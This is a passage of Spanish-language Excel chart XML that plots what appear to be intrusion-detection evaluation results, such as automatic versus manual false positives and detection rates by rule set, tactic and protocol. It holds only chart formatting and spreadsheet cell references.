    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FU$26:$FU$39</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FQ$26:$FQ$39</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$EQ$49:$EQ$62</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1580593289"/>
        <c:axId val="736820921"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1580593289"/>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736820921"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="736820921"/>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580593289"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart30.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>FP Automático VS Manual Total</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>FPs Automáticos</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FG$65:$FG$68</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FH$65:$FH$68</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FPs Manual</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FG$65:$FG$68</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FI$65:$FI$68</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1386846579"/>
        <c:axId val="2104746360"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1386846579"/>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2104746360"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2104746360"/>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386846579"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="t"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart3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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos/Ataques por RuleSet</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FZ$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F6B26B"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="1"/>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$28:$FY$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FZ$28:$FZ$31</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GA$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="1155CC"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr/>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$28:$FY$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GA$28:$GA$31</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="420303483"/>
        <c:axId val="886447380"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="420303483"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>RuleSet</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="886447380"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="886447380"/>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420303483"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart3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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>RS1</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="7F6000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FZ$48:$FZ$61</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>RS2</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="BF9000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="BF9000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GD$48:$GD$61</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>RS3</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="F1C232">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FZ$65:$FZ$78</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:v>RS4</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFD966">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FFD966">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GD$65:$GD$78</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1798657468"/>
        <c:axId val="703860294"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="1798657468"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="703860294"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="703860294"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.0"/>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Promedio Detección Eficaz Flujos</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798657468"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart3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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos por Táctica</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:areaChart>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>RS1</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="7F6000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GA$48:$GA$61</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>RS2</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="BF9000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="BF9000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GE$48:$GE$61</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>RS3</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="F1C232">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GA$65:$GA$78</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:v>RS4</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFD966">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="FFD966">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$FY$48:$FY$61</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GE$65:$GE$78</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1763983177"/>
        <c:axId val="653287794"/>
      </c:areaChart>
      <c:catAx>
        <c:axId val="1763983177"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Táctica</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="653287794"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="653287794"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.0"/>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Promedio Detección Eficaz Flujos</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763983177"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart34.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Flujos TP frente a Protocolo (RS4)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GH$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="F1C232"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="9"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GG$28:$GG$46</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GH$28:$GH$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1637172676"/>
        <c:axId val="1316435546"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1637172676"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1316435546"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1316435546"/>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Promedio Detección Flujos TP</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637172676"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart35.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Flujos TP frente a Protocolo (RS4)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GI$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="BF9000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GG$28:$GG$46</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GI$28:$GI$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1135003054"/>
        <c:axId val="726903645"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="1135003054"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="0"/>
        <c:axPos val="b"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:defRPr>
                </a:pPr>
                <a:r>
                  <a:rPr b="0">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>Protocolo</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="0"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:spPr/>
        <c:txPr>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="726903645"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="726903645"/>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Promedio Detección Eficaz Flujos TP</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135003054"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chart36.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000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial black"/>
              </a:rPr>
              <a:t>% Promedio Detección Eficaz Ataques TP frente a Protocolo (RS4)</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GJ$27</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="7F6000"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GG$28:$GG$46</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Análisis Resultados I - S'!$GJ$28:$GJ$46</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
